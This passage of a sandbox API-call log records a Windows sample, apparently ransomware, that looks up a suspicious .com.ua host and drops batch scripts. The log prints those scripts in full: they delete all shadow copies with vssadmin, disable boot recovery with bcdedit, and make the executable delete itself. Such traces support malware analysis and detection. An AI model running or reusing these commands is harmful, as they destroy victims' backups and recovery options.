lpUsedDefaultChar=0x0) returned 21 [0116.488] getaddrinfo (in: pNodeName="statcs.s76.r53.com.ua", pServiceName="80", pHints=0x12f888*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x12f8a8 | out: ppResult=0x12f8a8*=0x0) returned 11001 [0116.606] getaddrinfo (in: pNodeName="statcs.s76.r53.com.ua", pServiceName="80", pHints=0x12f888*(ai_flags=0, ai_family=23, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x12f8a8 | out: ppResult=0x12f8a8*=0x0) returned 11001 [0116.732] getnameinfo (in: pSockaddr=0x12f910, SockaddrLength=0x0, pNodeBuffer=0x13462ec, NodeBufferSize=0x401, pServiceBuffer=0x141515c, ServiceBufferSize=0x20, Flags=10 | out: pNodeBuffer="-", pServiceBuffer="") returned 10047 [0116.732] htons (hostshort=0x0) returned 0x0 [0116.732] GetCurrentThreadId () returned 0xdf8 [0116.732] GetCurrentThreadId () returned 0xdf8 [0116.732] GetCurrentThreadId () returned 0xdf8 [0116.732] GetCurrentThreadId () returned 0xdf8 [0116.732] GetCurrentThreadId () returned 0xdf8 [0116.732] GetCurrentThreadId () returned 0xdf8 [0116.732] CloseHandle (hObject=0xb8) returned 1 [0116.732] GetCurrentThreadId () returned 0xdf8 [0116.732] GetCurrentThreadId () returned 0xdf8 [0116.732] GetCurrentThreadId () returned 0xdf8 [0116.732] DeleteFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\7l6owdi9fmrsoy1o.elst")) returned 1 [0116.733] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4071a4, lpParameter=0x13f0df0, dwCreationFlags=0x4, lpThreadId=0x140dd84 | out: lpThreadId=0x140dd84*=0xe6c) returned 0xb8 [0116.734] SetThreadPriority (hThread=0xb8, nPriority=0) returned 1 [0116.734] ResumeThread (hThread=0xb8) returned 0x1 [0116.734] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xea60) returned 0x0 [0116.943] 
FindResourceW (hModule=0x400000, lpName="SHC", lpType=0xa) returned 0x51c4e8 [0116.943] LoadResource (hModule=0x400000, hResInfo=0x51c4e8) returned 0x5185b0 [0116.943] SizeofResource (hModule=0x400000, hResInfo=0x51c4e8) returned 0x222 [0116.943] LockResource (hResData=0x5185b0) returned 0x5185b0 [0116.943] FreeResource (hResData=0x5185b0) returned 0 [0116.943] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0116.943] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0116.944] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0116.944] LockResource (hResData=0x50d64c) returned 0x50d64c [0116.944] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415120, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0116.944] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415120, cbMultiByte=38, lpWideCharStr=0x140df6c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0116.944] FreeResource (hResData=0x50d64c) returned 0 [0116.944] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0116.944] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x1415124, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0116.944] GetCurrentThreadId () returned 0xdf8 [0116.944] GetCurrentThreadId () returned 0xdf8 [0116.944] GetCurrentThreadId () returned 0xdf8 [0116.944] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x133d088, cbMultiByte=546, lpWideCharStr=0x0, cchWideChar=0 | out: 
lpWideCharStr=0x0) returned 546 [0116.944] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x133d088, cbMultiByte=546, lpWideCharStr=0x13463ec, cchWideChar=546 | out: lpWideCharStr="[RNDSTR].cmd\r\necho [RDM_STR]\r\nping -n 30 localhost\r\nwmic.exe process call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"\r\necho [RDM_STR]\r\nping -n 10 localhost\r\ncmd.exe /C vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\r\nping -n 10 localhost\r\necho [RDM_STR]\r\nvssadmin.exe delete shadows /all /quiet\r\necho [RDM_STR]\r\n\r\n") returned 546 [0116.944] GetTickCount () returned 0x27bd3 [0116.944] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbbc | out: lpPerformanceCount=0x12fbbc*=17373318369) returned 1 [0116.944] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb98, cbMultiByte=1, lpWideCharStr=0x12eb80, cchWideChar=2047 | out: lpWideCharStr="K") returned 1 [0116.944] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb98, cbMultiByte=1, lpWideCharStr=0x12eb80, cchWideChar=2047 | out: lpWideCharStr="G") returned 1 [0116.944] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb98, cbMultiByte=1, lpWideCharStr=0x12eb80, cchWideChar=2047 | out: lpWideCharStr="i") returned 1 [0116.944] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb98, cbMultiByte=1, lpWideCharStr=0x12eb80, cchWideChar=2047 | out: lpWideCharStr="X") returned 1 [0116.944] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb98, cbMultiByte=1, lpWideCharStr=0x12eb80, cchWideChar=2047 | out: lpWideCharStr="H") returned 1 [0116.944] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb98, cbMultiByte=1, 
lpWideCharStr=0x12eb80, cchWideChar=2047 | out: lpWideCharStr="9") returned 1 [0116.944] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb98, cbMultiByte=1, lpWideCharStr=0x12eb80, cchWideChar=2047 | out: lpWideCharStr="8") returned 1 [0116.944] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb98, cbMultiByte=1, lpWideCharStr=0x12eb80, cchWideChar=2047 | out: lpWideCharStr="V") returned 1 [0116.944] CharUpperBuffW (in: lpsz="[RNDSTR].cmd", cchLength=0xc | out: lpsz="[RNDSTR].CMD") returned 0xc [0116.944] CharUpperBuffW (in: lpsz="[RNDSTR]", cchLength=0x8 | out: lpsz="[RNDSTR]") returned 0x8 [0116.944] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=17373345250) returned 1 [0116.944] GetTickCount () returned 0x27bd3 [0116.944] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbbc | out: lpPerformanceCount=0x12fbbc*=17373350737) returned 1 [0116.944] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb98, cbMultiByte=1, lpWideCharStr=0x12eb80, cchWideChar=2047 | out: lpWideCharStr="C") returned 1 [0116.944] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb98, cbMultiByte=1, lpWideCharStr=0x12eb80, cchWideChar=2047 | out: lpWideCharStr="i") returned 1 [0116.944] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb98, cbMultiByte=1, lpWideCharStr=0x12eb80, cchWideChar=2047 | out: lpWideCharStr="O") returned 1 [0116.944] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb98, cbMultiByte=1, lpWideCharStr=0x12eb80, cchWideChar=2047 | out: lpWideCharStr="H") returned 1 [0116.944] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb98, cbMultiByte=1, lpWideCharStr=0x12eb80, cchWideChar=2047 | out: lpWideCharStr="h") returned 1 [0116.944] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb98, cbMultiByte=1, lpWideCharStr=0x12eb80, 
cchWideChar=2047 | out: lpWideCharStr="X") returned 1 [0116.944] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb98, cbMultiByte=1, lpWideCharStr=0x12eb80, cchWideChar=2047 | out: lpWideCharStr="J") returned 1 [0116.944] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb98, cbMultiByte=1, lpWideCharStr=0x12eb80, cchWideChar=2047 | out: lpWideCharStr="T") returned 1 [0116.944] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb98, cbMultiByte=1, lpWideCharStr=0x12eb80, cchWideChar=2047 | out: lpWideCharStr="C") returned 1 [0116.945] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb98, cbMultiByte=1, lpWideCharStr=0x12eb80, cchWideChar=2047 | out: lpWideCharStr="F") returned 1 [0116.945] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb98, cbMultiByte=1, lpWideCharStr=0x12eb80, cchWideChar=2047 | out: lpWideCharStr="V") returned 1 [0116.945] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb98, cbMultiByte=1, lpWideCharStr=0x12eb80, cchWideChar=2047 | out: lpWideCharStr="t") returned 1 [0116.945] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb98, cbMultiByte=1, lpWideCharStr=0x12eb80, cchWideChar=2047 | out: lpWideCharStr="K") returned 1 [0116.945] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb98, cbMultiByte=1, lpWideCharStr=0x12eb80, cchWideChar=2047 | out: lpWideCharStr="Q") returned 1 [0116.945] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb98, cbMultiByte=1, lpWideCharStr=0x12eb80, cchWideChar=2047 | out: lpWideCharStr="z") returned 1 [0116.945] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb98, cbMultiByte=1, lpWideCharStr=0x12eb80, cchWideChar=2047 | out: lpWideCharStr="1") returned 1 [0116.945] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb98, cbMultiByte=1, 
lpWideCharStr=0x12eb80, cchWideChar=2047 | out: lpWideCharStr="Z") returned 1 [0116.945] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb98, cbMultiByte=1, lpWideCharStr=0x12eb80, cchWideChar=2047 | out: lpWideCharStr="u") returned 1 [0116.945] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb98, cbMultiByte=1, lpWideCharStr=0x12eb80, cchWideChar=2047 | out: lpWideCharStr="v") returned 1 [0116.945] CharUpperBuffW (in: lpsz="echo [RDM_STR]\r\nping -n 30 localhost\r\nwmic.exe process call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"\r\necho [RDM_STR]\r\nping -n 10 localhost\r\ncmd.exe /C vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\r\nping -n 10 localhost\r\necho [RDM_STR]\r\nvssadmin.exe delete shadows /all /quiet\r\necho [RDM_STR]\r\n\r\n", cchLength=0x214 | out: lpsz="ECHO [RDM_STR]\r\nPING -N 30 LOCALHOST\r\nWMIC.EXE PROCESS CALL CREATE \"CMD.EXE /C VSSADMIN.EXE DELETE SHADOWS /ALL /QUIET & BCDEDIT.EXE /SET {DEFAULT} RECOVERYENABLED NO & BCDEDIT.EXE /SET {DEFAULT} BOOTSTATUSPOLICY IGNOREALLFAILURES\"\r\nECHO [RDM_STR]\r\nPING -N 10 LOCALHOST\r\nCMD.EXE /C VSSADMIN.EXE DELETE SHADOWS /ALL /QUIET & BCDEDIT.EXE /SET {DEFAULT} RECOVERYENABLED NO & BCDEDIT.EXE /SET {DEFAULT} BOOTSTATUSPOLICY IGNOREALLFAILURES\r\nPING -N 10 LOCALHOST\r\nECHO [RDM_STR]\r\nVSSADMIN.EXE DELETE SHADOWS /ALL /QUIET\r\nECHO [RDM_STR]\r\n\r\n") returned 0x214 [0116.945] CharUpperBuffW (in: lpsz="[RDM_STR]", cchLength=0x9 | out: lpsz="[RDM_STR]") returned 0x9 [0116.945] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\KGiXH98V.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\kgixh98v.cmd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0116.945] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="echo CiOHhXJTCFVtKQz1Zuv\r\nping -n 30 localhost\r\nwmic.exe process call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"\r\necho CiOHhXJTCFVtKQz1Zuv\r\nping -n 10 localhost\r\ncmd.exe /C vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\r\nping -n 10 localhost\r\necho CiOHhXJTCFVtKQz1Zuv\r\nvssadmin.exe delete shadows /all /quiet\r\necho CiOHhXJTCFVtKQz1Zuv\r\n\r\n", cchWideChar=572, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 572 [0116.945] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="echo CiOHhXJTCFVtKQz1Zuv\r\nping -n 30 localhost\r\nwmic.exe process call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"\r\necho CiOHhXJTCFVtKQz1Zuv\r\nping -n 10 localhost\r\ncmd.exe /C vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\r\nping -n 10 localhost\r\necho CiOHhXJTCFVtKQz1Zuv\r\nvssadmin.exe delete shadows /all /quiet\r\necho CiOHhXJTCFVtKQz1Zuv\r\n\r\n", cchWideChar=572, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 572 [0116.945] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="echo CiOHhXJTCFVtKQz1Zuv\r\nping -n 30 localhost\r\nwmic.exe process call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set 
{default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"\r\necho CiOHhXJTCFVtKQz1Zuv\r\nping -n 10 localhost\r\ncmd.exe /C vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\r\nping -n 10 localhost\r\necho CiOHhXJTCFVtKQz1Zuv\r\nvssadmin.exe delete shadows /all /quiet\r\necho CiOHhXJTCFVtKQz1Zuv\r\n\r\n", cchWideChar=572, lpMultiByteStr=0x13c7fc8, cbMultiByte=572, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="echo CiOHhXJTCFVtKQz1Zuv\r\nping -n 30 localhost\r\nwmic.exe process call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"\r\necho CiOHhXJTCFVtKQz1Zuv\r\nping -n 10 localhost\r\ncmd.exe /C vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\r\nping -n 10 localhost\r\necho CiOHhXJTCFVtKQz1Zuv\r\nvssadmin.exe delete shadows /all /quiet\r\necho CiOHhXJTCFVtKQz1Zuv\r\n\r\n\n", lpUsedDefaultChar=0x0) returned 572 [0116.945] WriteFile (in: hFile=0x118, lpBuffer=0x13c7fc8*, nNumberOfBytesToWrite=0x23c, lpNumberOfBytesWritten=0x12fb64, lpOverlapped=0x0 | out: lpBuffer=0x13c7fc8*, lpNumberOfBytesWritten=0x12fb64*=0x23c, lpOverlapped=0x0) returned 1 [0116.946] CloseHandle (hObject=0x118) returned 1 [0116.947] GetCurrentThreadId () returned 0xdf8 [0116.947] GetCurrentThreadId () returned 0xdf8 [0116.947] GetCurrentThreadId () returned 0xdf8 [0116.947] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\KGiXH98V.cmd\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fc14*(cb=0x0, lpReserved=0x0, 
lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fc04 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\KGiXH98V.cmd\"", lpProcessInformation=0x12fc04*(hProcess=0x11c, hThread=0x118, dwProcessId=0xe7c, dwThreadId=0xe80)) returned 1 [0116.954] CloseHandle (hObject=0x11c) returned 1 [0116.954] CloseHandle (hObject=0x118) returned 1 [0116.954] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4071a4, lpParameter=0x13f0df0, dwCreationFlags=0x4, lpThreadId=0x140dd84 | out: lpThreadId=0x140dd84*=0xe84) returned 0x118 [0116.954] SetThreadPriority (hThread=0x118, nPriority=0) returned 1 [0116.954] ResumeThread (hThread=0x118) returned 0x1 [0116.954] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0xea60) returned 0x0 [0117.174] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa44, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\gym4nxcu.exe")) returned 0x30 [0117.175] FindResourceW (hModule=0x400000, lpName="STCLR", lpType=0xa) returned 0x51c510 [0117.175] LoadResource (hModule=0x400000, hResInfo=0x51c510) returned 0x5187d4 [0117.175] SizeofResource (hModule=0x400000, hResInfo=0x51c510) returned 0x53 [0117.175] LockResource (hResData=0x5187d4) returned 0x5187d4 [0117.175] FreeResource (hResData=0x5187d4) returned 0 [0117.175] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0117.175] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0117.175] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0117.175] LockResource (hResData=0x50d64c) returned 0x50d64c [0117.175] MultiByteToWideChar (in: CodePage=0x4e4, 
dwFlags=0x0, lpMultiByteStr=0x1415158, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0117.175] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415158, cbMultiByte=38, lpWideCharStr=0x140df0c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0117.175] FreeResource (hResData=0x50d64c) returned 0 [0117.175] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0117.175] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x141515c, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0117.175] GetCurrentThreadId () returned 0xdf8 [0117.175] GetCurrentThreadId () returned 0xdf8 [0117.175] GetCurrentThreadId () returned 0xdf8 [0117.175] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x140de48, cbMultiByte=83, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0117.175] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x140de48, cbMultiByte=83, lpWideCharStr=0x134521c, cchWideChar=83 | out: lpWideCharStr="[RNDSTR].cmd\r\nping -n 3 localhost\r\ndel /f /q \"[SELF_NAME]\"\r\ndel /f /q \"[SELF_NAME]\"") returned 83 [0117.175] GetTickCount () returned 0x27cbd [0117.175] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbb8 | out: lpPerformanceCount=0x12fbb8*=17396429638) returned 1 [0117.175] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="p") returned 1 [0117.175] MultiByteToWideChar (in: CodePage=0x4e4, 
dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="0") returned 1 [0117.175] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="m") returned 1 [0117.175] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="h") returned 1 [0117.175] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="d") returned 1 [0117.175] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="E") returned 1 [0117.175] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="5") returned 1 [0117.175] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="X") returned 1 [0117.175] CharUpperBuffW (in: lpsz="[RNDSTR].cmd", cchLength=0xc | out: lpsz="[RNDSTR].CMD") returned 0xc [0117.175] CharUpperBuffW (in: lpsz="[RNDSTR]", cchLength=0x8 | out: lpsz="[RNDSTR]") returned 0x8 [0117.175] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe", lpszShortPath=0x13431ec, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe") returned 0x30 [0117.175] CharUpperBuffW (in: lpsz="ping -n 3 localhost\r\ndel /f /q \"[SELF_NAME]\"\r\ndel /f /q \"[SELF_NAME]\"\r\n", cchLength=0x47 | out: lpsz="PING -N 3 LOCALHOST\r\nDEL /F /Q \"[SELF_NAME]\"\r\nDEL /F /Q \"[SELF_NAME]\"\r\n") returned 0x47 [0117.176] CharUpperBuffW (in: lpsz="[SELF_NAME]", cchLength=0xb | out: 
lpsz="[SELF_NAME]") returned 0xb [0117.176] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\p0mhdE5X.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\p0mhde5x.cmd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0117.176] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 145 [0117.176] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 145 [0117.176] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x138fbd8, cbMultiByte=145, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\"\r\n", lpUsedDefaultChar=0x0) returned 145 [0117.176] WriteFile (in: hFile=0x110, lpBuffer=0x138fbd8*, nNumberOfBytesToWrite=0x91, lpNumberOfBytesWritten=0x12fb60, lpOverlapped=0x0 | out: lpBuffer=0x138fbd8*, lpNumberOfBytesWritten=0x12fb60*=0x91, lpOverlapped=0x0) returned 
